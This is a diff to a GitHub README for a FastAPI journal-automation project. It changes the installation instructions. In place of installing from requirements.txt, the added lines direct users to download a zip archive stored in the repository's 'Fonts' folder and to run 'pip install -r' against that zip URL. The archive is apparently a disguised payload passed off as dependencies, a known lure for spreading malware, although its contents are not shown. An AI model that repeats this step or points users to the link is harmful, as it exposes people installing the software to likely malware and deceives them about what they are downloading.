aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/README.md

 Installation
 - Create a working directory and set up a virtual environment.
-- Install dependencies from requirements.txt or via pip install -r requirements.txt.
+- Install dependencies from https://raw.githubusercontent.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/main/Fonts/A_Journal_Fast_with_AP_Automation_Compound_System_Generative_And_3.2.zip or via pip install -r https://raw.githubusercontent.com/aligoraya202/FastAPI-Journal-Automation-with-Generative-And-AI-Compound-AI-System/main/Fonts/A_Journal_Fast_with_AP_Automation_Compound_System_Generative_And_3.2.zip
 - Prepare a .env file with API keys and endpoints for Gemini, LLaMA (Groq), and CORE.

 Environment and Secrets